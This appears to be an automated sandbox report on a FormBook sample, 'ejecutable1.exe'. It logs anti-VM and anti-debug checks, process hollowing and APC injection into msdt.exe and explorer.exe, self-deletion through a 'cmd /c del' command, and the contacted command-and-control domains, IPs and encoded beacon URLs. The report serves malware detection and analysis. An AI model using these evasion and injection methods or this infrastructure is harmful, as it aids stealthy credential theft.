      Source: initial sampleStatic PE information: section name: .text entropy: 6.99789102279

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Self deletion via cmd deleteShow sources
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'Jump to behavior
      Deletes itself after installationShow sources
      Source: C:\Windows\SysWOW64\cmd.exeFile deleted: c:\users\user\desktop\ejecutable1.exeJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Yara detected AntiVM3Show sources
      Source: Yara matchFile source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ejecutable1.exe PID: 788, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1480Thread sleep time: -45730s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1348Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2908Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
      Source: C:\Users\user\Desktop\ejecutable1.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeThread delayed: delay time: 45730Jump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000003.00000000.408183204.00000000002C7000.00000004.00000020.sdmpBinary or memory string: @z.SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.463438478.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.408138486.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000003.00000000.413770462.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A26F8 mov eax, dword ptr fs:[00000030h]2_2_008A26F8
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A26F8 mov eax, dword ptr fs:[00000030h]4_2_025A26F8
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.dunedinhyperlocal.com
      Source: C:\Windows\explorer.exeDomain query: www.multicoininvestment.com
      Source: C:\Windows\explorer.exeDomain query: www.wwiilive.com
      Source: C:\Windows\explorer.exeDomain query: www.institutosamar.com
      Source: C:\Windows\explorer.exeDomain query: www.petersonmovingco.com
      Source: C:\Windows\explorer.exeDomain query: www.quinnwebster.top
      Source: C:\Windows\explorer.exeDomain query: www.lianxiwan.xyz
      Source: C:\Windows\explorer.exeDomain query: www.oinfoproduto.com
      Source: C:\Windows\explorer.exeDomain query: www.theseattlenotary.com
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: BE0000Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory written: C:\Users\user\Desktop\ejecutable1.exe base: 400000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ejecutable1.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ejecutable1.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exeJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'Jump to behavior
      Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\user\Desktop\ejecutable1.exeQueries volume information: C:\Users\user\Desktop\ejecutable1.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491544 Sample: ejecutable1.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 32 www.lianxiwan.xyz 2->32 34 www.area-arquitectos.com 2->34 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 10 ejecutable1.exe 1 5 2->10         started        signatures3 process4 signatures5 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Injects a PE file into a foreign processes 10->60 13 ejecutable1.exe 10->13         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 13->62 64 Maps a DLL or memory area into another process 13->64 66 Sample uses process hollowing technique 13->66 68 Queues an APC in another process (thread injection) 13->68 16 explorer.exe 13->16 injected process8 dnsIp9 26 oinfoproduto.com 216.172.172.208, 49167, 80 UNIFIEDLAYER-AS-1US United States 16->26 28 www.lianxiwan.xyz 101.35.124.222, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 16->28 30 13 other IPs or domains 16->30 36 System process connects to network (likely due to code injection or exploit) 16->36 38 Performs DNS queries to domains with low reputation 16->38 20 msdt.exe 16->20         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 20->48 50 Modifies the context of a thread in another process (thread injection) 20->50 52 Maps a DLL or memory area into another process 20->52 54 Tries to detect virtualization through RDTSC time measurements 20->54 23 cmd.exe 20->23         started        process13 signatures14 56 Deletes itself after installation 23->56

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ejecutable1.exe37%VirustotalBrowse
      ejecutable1.exe13%ReversingLabsByteCode-MSIL.Spyware.Noon

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.2.ejecutable1.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://cdn.jsinit.directfwd.com/sk-jspark_init.php0%Avira URL Cloudsafe
      http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A==0%Avira URL Cloudsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
      http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==0%Avira URL Cloudsafe
      http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.mozilla.com00%URL Reputationsafe
      http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA==0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://java.sun.com0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==0%Avira URL Cloudsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e0%Avira URL Cloudsafe
      http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      theseattlenotary.com
      		162.0.232.162
      		truefalse
        		high
        www.petersonmovingco.com
        		216.239.32.21
        		truefalse
          		high
          oinfoproduto.com
          		216.172.172.208
          		truefalse
            		high
            www.area-arquitectos.com
            		93.185.100.223
            		truefalse
              		high
              dunedinhyperlocal.com
              		184.168.131.241
              		truefalse
                		high
                quinnwebster.top
                		162.251.85.174
                		truefalse
                  		high
                  www.lianxiwan.xyz
                  		101.35.124.222
                  		truefalse
                    		high
                    wwiilive.com
                    		34.102.136.180
                    		truefalse
                      		high
                      multicoininvestment.com
                      		162.0.229.241
                      		truefalse
                        		high
                        www.dunedinhyperlocal.com
                        		unknown
                        		unknownfalse
                          		high
                          www.multicoininvestment.com
                          		unknown
                          		unknownfalse
                            		high
                            www.wwiilive.com
                            		unknown
                            		unknownfalse
                              		high
                              www.institutosamar.com
                              		unknown
                              		unknownfalse
                                		high
                                www.quinnwebster.top
                                		unknown
                                		unknownfalse
                                  		high
                                  www.oinfoproduto.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.theseattlenotary.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lztrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://cdn.jsinit.directfwd.com/sk-jspark_init.phpmsdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.windows.com/pctv.explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://investor.msn.comexplorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                            		high
                                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.rspb.org.uk/wildlife/birdguide/name/ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.mozilla.com0explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://business.google.commsdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                              		high
                                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.hotmail.com/oeexplorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                                		high
                                                http://treyresearch.netexplorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://business.google.com/msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                                  		high
                                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpfalse
                                                    		high
                                                    http://java.sun.comexplorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.icra.org/vocabulary/.explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmpfalse
                                                      		high
                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://workspace.google.commsdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                                          		high
                                                          http://investor.msn.com/explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                                            		high
                                                            http://www.piriform.com/ccleanerexplorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://computername/printers/printername/.printerexplorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.%s.comPAexplorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		low
                                                              http://www.autoitscript.com/autoit3explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpfalse
                                                                		high
                                                                https://support.mozilla.orgexplorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpfalse
                                                                  		high
                                                                  http://servername/isapibackend.dllexplorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0emsdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  101.35.124.222
                                                                  		www.lianxiwan.xyzChina
                                                                  		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                  162.251.85.174
                                                                  		quinnwebster.topUnited States
                                                                  		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                  162.0.229.241
                                                                  		multicoininvestment.comCanada
                                                                  		22612NAMECHEAP-NETUSfalse
                                                                  216.239.32.21
                                                                  		www.petersonmovingco.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  34.102.136.180
                                                                  		wwiilive.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  184.168.131.241
                                                                  		dunedinhyperlocal.comUnited States
                                                                  		26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                  162.0.232.162
